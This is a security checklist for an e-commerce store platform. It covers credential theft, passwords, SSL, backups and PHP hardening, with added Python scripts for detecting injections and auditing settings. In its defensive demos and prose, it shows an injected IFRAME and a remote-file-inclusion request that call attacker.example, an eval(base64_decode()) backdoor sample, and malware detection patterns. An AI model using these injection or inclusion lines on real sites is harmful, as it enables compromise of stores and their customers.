Security checklist

From AVACTIS : Ecommerce Shopping Cart Software Wiki

Nowadays hackers use many different types of sophisticated attacks on web servers and web applications.

Security is crucial for e-commerce. In this post we have collected security tips and recommendations that can help you make your store and server considerably harder to attack. No single measure makes a site "hacker-proof"; the value is in applying all of them together.

I. General Security of Your Computer and Access Information

Your store can be hacked even if your server and web software are absolutely secure.

How is that possible? Hackers can steal FTP access information from your local computer using a hidden trojan program. The trojan can read the passwords saved by your FTP client, browser or e-mail program, harvest them from memory while those programs run, or log your key presses, and then send them to the hackers' server.

Then the hackers' automated tools visit every site for which they now hold FTP credentials, modify the files with the most common names (e.g. index.php, admin.php, config.php, db*.php etc.), or even every file they can reach, and add malicious code to them. This can be spam links, IFRAMEs that load pages from the hackers' websites, web shells, and so on. Because the attacker logs in with your own valid credentials, the server sees nothing unusual; the compromise usually shows up only as changed files.
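The attack described above leaves two traces a store owner can look for: files whose contents changed without anyone deploying a change, and injected code in files that are still being served. As an added example (my own illustration, not code from this wiki or from the Avactis project), the Python script below builds a SHA-256 manifest of a store directory, diffs it against a later manifest, and searches web files for a few typical injection patterns. The sample store files, the dbx.php backdoor name and the attacker.example URL are constructed for the demonstration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Patterns typical of mass-injection malware (an illustrative selection, not a
# complete signature set): hidden IFRAMEs, obfuscated eval() wrappers and the
# old preg_replace() "/e" code-execution modifier.
SUSPICIOUS = [
    ("hidden-iframe", re.compile(
        r"<iframe[^>]*(visibility\s*:\s*hidden|display\s*:\s*none|height\s*=\s*[\"']?0)", re.I)),
    ("obfuscated-eval", re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    ("preg_replace-e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
]
SCANNED_SUFFIXES = {".php", ".html", ".htm", ".js"}


def build_manifest(root):
    """Map each file under root (relative path) to its SHA-256 digest.
    Run once on a known-clean store and keep the result OFF the server."""
    root = Path(root)
    return {
        path.relative_to(root).as_posix(): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(root.rglob("*")) if path.is_file()
    }


def diff_manifest(baseline, current):
    """Files added, removed or changed since the baseline manifest."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_for_injections(root):
    """Map relative path -> names of SUSPICIOUS patterns found, for web files only."""
    root = Path(root)
    hits = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            text = path.read_text(errors="replace")
            names = [name for name, rx in SUSPICIOUS if rx.search(text)]
            if names:
                hits[path.relative_to(root).as_posix()] = names
    return hits


def demo():
    """Constructed scenario: baseline a two-file store, then simulate the
    attacker's FTP session (IFRAME appended to index.php, new backdoor dbx.php)."""
    with tempfile.TemporaryDirectory() as root:
        store = Path(root)
        (store / "index.php").write_text("<?php require 'config.php'; echo 'store'; ?>\n")
        (store / "config.php").write_text("<?php $db_user = 'shop'; ?>\n")
        baseline = build_manifest(store)

        # What the hackers' automated tool does with stolen FTP credentials
        with (store / "index.php").open("a") as f:
            f.write('<iframe src="http://attacker.example/x" style="visibility:hidden"></iframe>\n')
        (store / "dbx.php").write_text("<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>\n")

        return diff_manifest(baseline, build_manifest(store)), scan_for_injections(store)


if __name__ == "__main__":
    changes, hits = demo()
    print("changes:", changes)
    print("suspicious:", hits)
```

Keep the baseline manifest somewhere the FTP account cannot reach (a hacker with your credentials could otherwise rewrite the manifest along with the files), and treat the pattern list as a starting point: it catches the crude mass injections this post describes, not a careful attacker.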

How do you protect your local computer and access information?

  • Make sure your computer is malware-free

Scan your local computer using up-to-date anti-malware programs. Make sure your computer and the computers of your developers and employees are protected with the latest anti-virus software. You can use commercial or free software, for example the free Microsoft Security Essentials. Note that not every anti-virus program detects IFRAME-injecting malware, so a second-opinion scanner is worthwhile; one of the best anti-malware scanners is PrevX.

  • Never store access information in plain text

If you save your passwords to text files, they can easily be read by malware. Use specially designed password storage software, which keeps the passwords in an encrypted database that is unlocked with one master password. A good example is the cross-platform open-source KeePass.

  • Never send access information in plain text

Hackers use sniffer programs to monitor network traffic and capture access information. So even if your computer is 100% secure and your server is 110% secure, your FTP login/password can be caught in between, because plain FTP, HTTP, POP3 and SMTP all send passwords unencrypted. Transfer access information only over encrypted connections:

  • HTTPS for web forms (like the support form on our site)
  • HTTPS for web mail ( Gmail has a setting for always using HTTPS)
  • Secure POP and SMTP if you're using a standalone mail program (Outlook and Thunderbird 3 connect through SSL by default)
  • SFTP (file transfer over SSH) or FTPS instead of plain FTP for file transfer (a great Windows client that supports both is WinSCP) etc.

Before connecting or sending a password anywhere, check what kind of connection it will use and find a way to switch to an encrypted one.

  • Change access information regularly

It is recommended to change access information at least several times a year, and immediately after any suspected compromise. That way a password that hackers manage to steal is useful to them only for a limited time.

  • Use strong passwords for FTP, SSH and control panels

Hackers use the so-called "brute force" attack: automated programs that try one password after another and quickly find a simple one. For example, if you use a password that consists only of digits, hackers can guess it within minutes or at most an hour or so.

More information about password cracking methods (Please read it!)

It is highly recommended to use strong passwords which consist of digits, upper- and lower-case letters and special symbols. The password should be longer than 8 characters; 12 or more is better. Hackers use dictionaries with millions of common passwords and their predictable variations, like "admin12345", "pass54321", "Yahoo1999", etc., so do not use common words and numbers, or simple variations of them, as your password.

You can test the strength of a password using the on-line tool from Microsoft, but never type a password you actually use into any web page; test only candidates built the same way. Example of a strong password: h7X8_Cns-2RB_;*8q!v (it was generated by KeePass, referenced above; do not reuse it, since it is now public).

If you still prefer to memorise your passwords, read these useful tips on how to create strong passwords that you can easily remember.
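To make the brute-force arithmetic concrete, the added Python example below (my own illustration, not a tool from this wiki or from Avactis) estimates the search space of a password from its length and the character classes it uses, checks it against a small constructed dictionary, and generates a random password with the operating system's CSPRNG, which is what a KeePass-style generator does. The guess rate of 10^10 per second is an assumption for an offline attack on a fast hash; online guessing against a live server is far slower.

```python
import math
import secrets
import string

# Constructed sample of the "hackers' dictionary"; real wordlists hold millions
# of leaked passwords and their common variations.
COMMON_PASSWORDS = {"admin12345", "pass54321", "yahoo1999", "password", "123456", "qwerty"}

# Assumed attacker speed for the time estimate (offline cracking of a fast
# hash on GPU hardware). Not a figure from this post.
GUESSES_PER_SECOND = 1e10

CHARACTER_CLASSES = [
    ("lowercase", string.ascii_lowercase),   # 26 characters
    ("uppercase", string.ascii_uppercase),   # 26
    ("digits", string.digits),               # 10
    ("symbols", string.punctuation),         # 32
]


def classes_used(password):
    return [name for name, chars in CHARACTER_CLASSES if any(c in chars for c in password)]


def search_space(password):
    """Number of candidates an attacker must try in the worst case if they
    know only the length and which character classes are used."""
    used = classes_used(password)
    alphabet = sum(len(chars) for name, chars in CHARACTER_CLASSES if name in used)
    return alphabet ** len(password)


def entropy_bits(password):
    return math.log2(search_space(password)) if password else 0.0


def crack_seconds(password, rate=GUESSES_PER_SECOND):
    """Worst-case time to exhaust the search space at `rate` guesses/second."""
    return search_space(password) / rate


def check_password(password):
    """Return (ok, reasons). The dictionary check is case-insensitive because
    wordlists already contain the usual capitalisation variants."""
    reasons = []
    if password.lower() in COMMON_PASSWORDS:
        reasons.append("found in common-password dictionary")
    if len(password) < 12:
        reasons.append("shorter than 12 characters")
    if len(classes_used(password)) < 3:
        reasons.append("fewer than 3 character classes")
    if entropy_bits(password) < 60:
        reasons.append("search space below 2^60")
    return (not reasons, reasons)


def generate_password(length=20):
    """Random password drawn from all four classes with the OS CSPRNG (secrets),
    retried until every class is present, as a password-manager generator does."""
    alphabet = "".join(chars for _, chars in CHARACTER_CLASSES)
    while True:
        candidate = "".join(secrets.choice(alphabet) for _ in range(length))
        if len(classes_used(candidate)) == len(CHARACTER_CLASSES):
            return candidate


if __name__ == "__main__":
    for pw in ["19870512", "admin12345", "h7X8_Cns-2RB_;*8q!v", generate_password()]:
        ok, reasons = check_password(pw)
        print(f"{pw!r}: {entropy_bits(pw):.1f} bits, ~{crack_seconds(pw):.3g} s to exhaust, "
              f"{'OK' if ok else 'weak: ' + '; '.join(reasons)}")
```

The 8-digit password has only 10^8 possibilities, which is why a digits-only password falls in minutes even against a slow target, while the 19-character KeePass example above has a search space of about 2^124 and is out of reach of exhaustive search. The entropy figure is an upper bound: a password made from dictionary words has far fewer real possibilities than its length suggests, which is what the dictionary check is for.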

Here's another handful of tips straight from Microsoft: 4 steps to protect your computer

II. Security of Avactis Stores and Other Web Applications

Here are some recommendations and tips on how to make your store more secure. If you cannot do these steps yourself, don't hesitate to contact our support team for help.

  • 3rd party software

If you run several web applications on your server, e.g. a forum, image gallery, blog, etc., make sure that you use the latest versions and that the latest security patches are applied to them. Hackers usually break in through known exploits/security holes in popular programs that allow them to execute system commands on your server. Do not leave old or unused web applications reachable over the web; remove them rather than merely unlinking them, since hackers scan for them by path.

  • Encryption of credit card information

Avactis uses two types of encryption: the RSA 1024-bit public-key algorithm and the Blowfish symmetric algorithm. In the "Manual/Offline Credit Card Processing" module settings you can generate a private key file. To see credit card data you will need to upload this private key file each time. Keep that file on your own computer or in a password manager, never on the web server: as long as the private key is not on the server, hackers who steal your database and all files cannot decrypt the credit card numbers. Two caveats: 1024-bit RSA keys are considered weak by today's standards (NIST has recommended 2048 bits or more since 2013), and storing card numbers at all puts your store in PCI DSS scope, so use a hosted payment gateway where possible and keep offline processing for cases that truly need it.

  • Check that the installation files have been removed

After the installation of Avactis finishes, the files install.dat and install.php are deleted automatically. Please verify that they really have been deleted; if not, delete them manually. Otherwise anyone who can reach install.php could re-run the installer and overwrite your data.

  • Backup your store data on a regular basis

For data security purposes, it is highly recommended to perform backups at regular intervals - once a day (optimal), a week, or a month, depending on the size of your data and on how often it is updated. It is also recommended to download backup files to your computer regularly to prevent loss of data in the event of server failure; a backup that lives only on the server disappears together with it. If a server failure occurs, you will be able to restore the on-line store from the backup files saved on your computer. Test a restore from time to time, since an untested backup is not a backup, and remember that backup files contain your customer data and must be stored as securely as the store itself.

Avactis has an automatic backup system which can be run as a cron job, so backups are created regularly without manual work. You can also use the backup service of your hosting provider, but make sure it backs up databases as well as files.

For more information please refer to our manual: Data Backup and Restore

  • SSL encryption

It is highly recommended to use the secure HTTPS protocol at least for checkout pages and login pages (customer sign-in and Admin sign-in). Otherwise passwords and card data travel in plain text and can be captured by the same sniffers described in section I. Today the simplest and safest choice is to serve the whole store over HTTPS.

Avactis allows you to easily switch all or just the needed parts of the store front (Catalog, Shopping Cart, Checkout, File Download, Customer Account, Customer Authorization) to HTTPS. The same applies to the Admin area: either the whole Admin Area (Backend) or only Sign-In & Admin Members Management, Orders & Customers, and Payment & Shipping Modules Settings.

You can configure it in Admin >> HTTPS settings window.

If an SSL certificate is not installed on your server, obtain one from a trusted certificate authority and ask your hosting provider to configure it for you before setting up HTTPS in Avactis.

  • Protection of Admin Area with a .htaccess web password

You can additionally protect the avactis-system/admin/ directory with an .htaccess web password (HTTP Basic authentication), so that the admin login form itself is reachable only after a second password. Do this only on HTTPS, because Basic authentication sends the password base64-encoded, not encrypted, with every request. More information is available in the Authentication and Authorization tutorial on the official Apache web server site.

III. Security of Hosting Server Software

On shared or managed hosting, the security of the server is the job of your hosting provider. If your server is dedicated and unmanaged, it is your job.

Full server hardening is beyond the scope of this post, as there is a huge number of server settings and recommendations, so here are just a few tips:

  • Make sure your hosting uses a firewall and a good anti-virus program;
  • You can scan your site and hosting server with a PCI DSS scanner, for example the Comodo company product, in order to find some server-side security issues;
  • You can disable remote script inclusion by setting allow_url_fopen = Off and allow_url_include = Off in php.ini. allow_url_include = Off is the critical one: with it On, a script that builds an include path from user input can be made to load and execute PHP code from a hacker's server. allow_url_fopen = Off additionally stops PHP reading remote URLs at all, which some applications need, so test your store after changing it. Both directives can only be changed in php.ini or the server configuration, not in .htaccess, so on shared hosting ask your provider;
  • You can ask your hosting provider to install the mod_security module (a web application firewall) for Apache;
  • If your server control panel is Parallels Plesk, you can scan your website with the Watchdog 2.0 tool to detect rootkits and other server security issues.
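The two PHP settings deserve a concrete illustration, added here as an example of my own (not part of this wiki or of Avactis). With allow_url_include = On, a script such as include($_GET['page']); can be turned into a remote file inclusion with a request like ?page=http://attacker.example/shell.txt, and the hacker's code then runs on your server. The checker below parses two constructed php.ini fragments (the weak settings beside the hardened ones), reports every required directive that is still enabled, and, for directives missing from the file, judges by PHP's compiled-in defaults instead of ignoring them.

```python
# Constructed php.ini fragments: the permissive settings beside the hardened ones.
WEAK_INI = """\
; Fopen wrappers ;
allow_url_fopen = On
allow_url_include = On
"""

HARDENED_INI = """\
; Fopen wrappers ;
allow_url_fopen = Off
allow_url_include = Off
"""

# Directives the checklist says to switch off.
REQUIRED_OFF = ("allow_url_fopen", "allow_url_include")

# PHP's compiled-in values when a directive is absent from php.ini:
# allow_url_fopen defaults to On, allow_url_include to Off.
PHP_DEFAULTS = {"allow_url_fopen": "on", "allow_url_include": "off"}

# Spellings PHP accepts as "enabled" for boolean directives.
TRUTHY = {"1", "on", "true", "yes"}


def parse_ini(text):
    """Minimal php.ini reader: `key = value` lines, ';' comments stripped,
    section headers ignored, quotes removed, values lower-cased for comparison."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip("\"'").lower()
    return settings


def audit(text):
    """Return (directive, effective value, where it came from) for every
    REQUIRED_OFF directive that is still enabled in the given php.ini text."""
    settings = parse_ini(text)
    findings = []
    for directive in REQUIRED_OFF:
        if directive in settings:
            value, source = settings[directive], "php.ini"
        else:
            value, source = PHP_DEFAULTS[directive], "compiled-in default"
        if value in TRUTHY:
            findings.append((directive, value, source))
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI), ("empty", "")):
        print(label + ":", audit(ini) or "OK")
```

Note the asymmetry the empty-file case exposes: a php.ini that says nothing about these directives still has allow_url_fopen on. In PHP, allow_url_include only takes effect when allow_url_fopen is on, so switching allow_url_fopen off alone already blocks remote includes, at the price of breaking code that reads remote URLs with file_get_contents() and friends; switching only allow_url_include off closes the include hole while leaving remote reads working, which is the setting to insist on with your provider if the other one breaks your store.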